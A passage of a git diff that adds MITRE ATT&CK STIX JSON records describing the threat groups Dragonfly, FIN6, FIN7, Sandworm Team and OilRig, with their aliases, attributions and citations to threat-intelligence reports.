"[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)", + "aliases": [ + "Dragonfly", + "TEMP.Isotope", + "DYMALLOY", + "Berserk Bear", + "TG-4192", + "Crouching Yeti", + "IRON LIBERTY", + "Energetic Bear" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "created": "2017-05-31T21:32:05.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0035", + "external_id": "G0035" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TEMP.Isotope", + "description": "(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)" + }, + { + "source_name": "Crouching Yeti", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TG-4192", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Dragonfly", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Energetic Bear", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "CISA AA20-296A Berserk Bear December 2020", + "description": "CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions" + }, + { + "source_name": "DOJ Russia Targeting Critical Infrastructure March 2022", + "description": "Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.", + "url": "https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" + }, + { + "source_name": "Dragos DYMALLOY ", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.", + "url": "https://www.dragos.com/threat/dymalloy/" + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Mandiant Ukraine Cyber Threats January 2022", + "description": "Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.", + "url": "https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" + }, + { + "source_name": "Secureworks MCMD July 2019", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis" + }, + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" + }, + { + "source_name": "Secureworks Karagany July 2019", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE\u2019S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": "Symantec Dragonfly 2.0 October 2017", + "description": "Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + }, + { + "source_name": "UK GOV FSB Factsheet April 2022", + "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", + "url": "https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json new file mode 100644 index 0000000000000000000000000000000000000000..034ce703c2cc17f8d2dda76dc47145cfbdb8a016 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb.json @@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--f63836fc-0e73-477e-9a42-5c51c1519324", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:50:17.471Z", + "name": "FIN6", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "aliases": [ + "FIN6", + "Magecart Group 6", + "ITG08", + "Skeleton Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.3", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Drew Church, Splunk" + ], + "type": "intrusion-set", + "id": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "created": "2017-05-31T21:32:06.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0037", + "external_id": "G0037" + }, + { + "source_name": "Skeleton Spider", + "description": "(Citation: Crowdstrike Global Threat Report Feb 2018)" + }, + { + "source_name": "FIN6", + "description": "(Citation: FireEye FIN6 April 2016)" + }, + { + "source_name": "Magecart Group 6", + "description": "(Citation: Security Intelligence ITG08 April 2020)" + }, + { + "source_name": "ITG08", + "description": "(Citation: Security Intelligence More Eggs Aug 2019)" + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, + { + "source_name": "FireEye FIN6 April 2016", + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + }, + { + "source_name": "Security Intelligence ITG08 April 2020", + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.", + "url": "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" + }, + { + "source_name": "Security Intelligence More Eggs Aug 2019", + "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", + "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json new file mode 100644 index 0000000000000000000000000000000000000000..9b4e559e2a54956a1a9f55ff27b915cec639070a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc.json @@ -0,0 +1,105 @@ +{ + "type": "bundle", + "id": "bundle--c927b2ed-c149-416c-bf1c-a70469663b37", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:51:04.185Z", + "name": "FIN7", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)", + "aliases": [ + "FIN7", + "GOLD NIAGARA", + "ITG14", + "Carbon Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.2", + "x_mitre_contributors": [ + "Edward Millington" + ], + "type": "intrusion-set", + "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "created": "2017-05-31T21:32:09.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0046", + "external_id": "G0046" + }, + { + "source_name": "Carbon Spider", + "description": "(Citation: CrowdStrike Carbon Spider August 2021)" + }, + { + "source_name": "FIN7", + "description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)" + }, + { + "source_name": "GOLD NIAGARA", + "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)" + }, + { + "source_name": "FireEye CARBANAK June 2017", + "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "FireEye FIN7 Aug 2018", + "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "FireEye FIN7 Shim Databases", + "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + }, + { + "source_name": "Morphisec FIN7 June 2017", + "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.", + "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry" + }, + { + "source_name": "ITG14", + "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + }, + { + "source_name": "FireEye FIN7 March 2017", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + }, + { + "source_name": "IBM Ransomware Trends September 2020", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json new file mode 100644 index 0000000000000000000000000000000000000000..78c016477b67a2dca0b7a0f3d131c0d4b9a47170 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192.json @@ -0,0 +1,141 @@ +{ + "type": "bundle", + "id": "bundle--8b7af9cc-74d3-4224-9d6b-8270ac0079a8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike\u2019s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json new file mode 100644 index 0000000000000000000000000000000000000000..4e3f6e81cfcc11bf75e848403f3248c916678acc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json @@ -0,0 +1,127 @@ +{ + "type": "bundle", + "id": "bundle--e6a6e0b9-6b67-4ccc-8556-517018ace9e8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-06T20:58:52.317Z", + "name": "OilRig", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)", + "aliases": [ + "OilRig", + "COBALT GYPSY", + "IRN2", + "APT34", + "Helix Kitten", + "Evasive Serpens" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Robert Falcone", + "Bryan Lee", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0049", + "external_id": "G0049" + }, + { + "source_name": "IRN2", + "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "OilRig", + "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)" + }, + { + "source_name": "COBALT GYPSY", + "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)" + }, + { + "source_name": "Helix Kitten", + "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "Evasive Serpens", + "description": "(Citation: Unit42 OilRig Playbook 2023)" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + }, + { + "source_name": "ClearSky OilRig Jan 2017", + "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.", + "url": "http://www.clearskysec.com/oilrig/" + }, + { + "source_name": "Palo Alto OilRig May 2016", + "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + }, + { + "source_name": "Palo Alto OilRig April 2017", + "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" + }, + { + "source_name": "Palo Alto OilRig Oct 2016", + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + }, + { + "source_name": "Unit 42 QUADAGENT July 2018", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" + }, + { + "source_name": "Crowdstrike Helix Kitten Nov 2018", + "description": "Meyers, A. (2018, November 27). Meet CrowdStrike\u2019s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Secureworks COBALT GYPSY Threat Profile", + "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" + }, + { 